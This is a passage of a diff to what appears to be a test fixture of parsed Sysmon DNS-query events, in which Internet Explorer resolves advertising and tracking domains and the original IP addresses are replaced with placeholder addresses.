xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053914100Z'/\u003e\u003cEventRecordID\u003e188\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.090\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edpm.demdex.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 gslb-2.demdex.net;type: 5 edge-va6.demdex.net;type: 5 dcs-edge-va6-802167536.us-east-1.elb.amazonaws.com;::ffff:54.157.69.185;::ffff:18.209.139.81;::ffff:18.233.36.36;::ffff:52.54.198.81;::ffff:52.55.201.28;::ffff:18.210.34.44;::ffff:52.72.163.149;::ffff:18.232.198.130;192.5.6.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053914100Z'/\u003e\u003cEventRecordID\u003e188\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.090\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edpm.demdex.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 gslb-2.demdex.net;type: 5 edge-va6.demdex.net;type: 5 dcs-edge-va6-802167536.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:09.053Z", @@ -17143,39 +16953,39 @@ "type": "CNAME" }, { - "data": "68.67.179.228", + "data": "89.160.20.156", "type": "A" }, { - "data": "68.67.180.44", + "data": "89.160.20.156", "type": "A" }, { - "data": "204.13.192.141", + "data": "89.160.20.156", "type": "A" }, { - "data": "68.67.178.230", + "data": "89.160.20.156", "type": "A" }, { - "data": "68.67.178.252", + "data": "89.160.20.156", "type": "A" }, { - "data": "68.67.179.23", + "data": "89.160.20.156", "type": "A" }, { - "data": "68.67.179.232", + "data": "89.160.20.156", "type": "A" }, { - "data": "68.67.180.12", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -17183,22 +16993,22 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" } ], "resolved_ip": [ - "68.67.179.228", - "68.67.180.44", - "204.13.192.141", - "68.67.178.230", - "68.67.178.252", - "68.67.179.23", - "68.67.179.232", - "68.67.180.12", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30" + "192.168.14.30" ] }, "network": { @@ -17215,23 +17025,16 @@ "secure.adnxs.com" ], "ip": [ - "68.67.179.228", - "68.67.180.44", - "204.13.192.141", - "68.67.178.230", - "68.67.178.252", - "68.67.179.23", - "68.67.179.232", - "68.67.180.12", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30" + "192.168.14.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313955519Z", + "ingested": "2021-12-09T13:49:44.739914600Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053938800Z'/\u003e\u003cEventRecordID\u003e189\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.308\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esecure.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 g.geogslb.com;type: 5 ib.anycast.adnxs.com;::ffff:68.67.179.228;::ffff:68.67.180.44;::ffff:204.13.192.141;::ffff:68.67.178.230;::ffff:68.67.178.252;::ffff:68.67.179.23;::ffff:68.67.179.232;::ffff:68.67.180.12;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053938800Z'/\u003e\u003cEventRecordID\u003e189\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.308\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esecure.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 g.geogslb.com;type: 5 ib.anycast.adnxs.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:09.053Z", @@ -17299,12 +17102,12 @@ "type": "CNAME" }, { - "data": "204.154.111.122", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "204.154.111.122" + "89.160.20.156" ] }, "network": { @@ -17321,13 +17124,13 @@ "tps.doubleverify.com" ], "ip": [ - "204.154.111.122" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313956779Z", + "ingested": "2021-12-09T13:49:44.739920400Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053949300Z'/\u003e\u003cEventRecordID\u003e190\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.478\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etps.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tps-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053949300Z'/\u003e\u003cEventRecordID\u003e190\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.478\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etps.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tps-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:09.053Z", @@ -17391,39 +17194,39 @@ "type": "CNAME" }, { - "data": "52.71.175.22", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.71.208.229", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.86.201.172", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.7.6.198", + "data": "89.160.20.156", "type": "A" }, { - "data": "54.152.156.164", + "data": "89.160.20.156", "type": "A" }, { - "data": "54.152.56.202", + "data": "89.160.20.156", "type": "A" }, { - "data": "54.164.15.83", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.86.191.75", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -17431,22 +17234,22 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" } ], "resolved_ip": [ - "52.71.175.22", - "52.71.208.229", - "52.86.201.172", - "52.7.6.198", - "54.152.156.164", - "54.152.56.202", - "54.164.15.83", - "52.86.191.75", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30" + "192.168.14.30" ] }, "network": { @@ -17462,23 +17265,16 @@ "i.liadm.com" ], "ip": [ - "52.71.175.22", - "52.71.208.229", - "52.86.201.172", - "52.7.6.198", - "54.152.156.164", - "54.152.56.202", - "54.164.15.83", - "52.86.191.75", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30" + "192.168.14.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313958100Z", + "ingested": "2021-12-09T13:49:44.739926300Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067752300Z'/\u003e\u003cEventRecordID\u003e191\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.536\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ei.liadm.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 idaas-production.us-east-1.elasticbeanstalk.com;::ffff:52.71.175.22;::ffff:52.71.208.229;::ffff:52.86.201.172;::ffff:52.7.6.198;::ffff:54.152.156.164;::ffff:54.152.56.202;::ffff:54.164.15.83;::ffff:52.86.191.75;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067752300Z'/\u003e\u003cEventRecordID\u003e191\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.536\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ei.liadm.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 idaas-production.us-east-1.elasticbeanstalk.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:09.067Z", @@ -17538,11 +17334,11 @@ }, "answers": [ { - "data": "67.231.251.189", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -17550,7 +17346,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -17558,7 +17354,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -17566,7 +17362,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -17574,7 +17370,7 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" }, { @@ -17582,23 +17378,23 @@ "type": "AAAA" }, { - "data": "192.35.51.30", + "data": "192.168.51.30", "type": "A" } ], "resolved_ip": [ - "67.231.251.189", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30", - "192.35.51.30" + "192.168.51.30" ] }, "network": { @@ -17613,24 +17409,24 @@ "pixel.s3xified.com" ], "ip": [ - "67.231.251.189", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30", - "192.35.51.30" + "192.168.51.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313959450Z", + "ingested": "2021-12-09T13:49:44.739932100Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067766000Z'/\u003e\u003cEventRecordID\u003e192\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.544\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel.s3xified.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:67.231.251.189;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067766000Z'/\u003e\u003cEventRecordID\u003e192\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.544\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel.s3xified.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:09.067Z", @@ -17690,15 +17486,15 @@ }, "answers": [ { - "data": "104.20.252.85", + "data": "89.160.20.156", "type": "A" }, { - "data": "104.20.253.85", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -17706,7 +17502,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -17714,7 +17510,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -17722,7 +17518,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -17730,22 +17526,22 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" } ], "resolved_ip": [ - "104.20.252.85", - "104.20.253.85", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "network": { @@ -17760,23 +17556,22 @@ "router.infolinks.com" ], "ip": [ - "104.20.252.85", - "104.20.253.85", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313960856Z", + "ingested": "2021-12-09T13:49:44.739938400Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067776600Z'/\u003e\u003cEventRecordID\u003e193\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.550\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003erouter.infolinks.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:104.20.252.85;::ffff:104.20.253.85;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 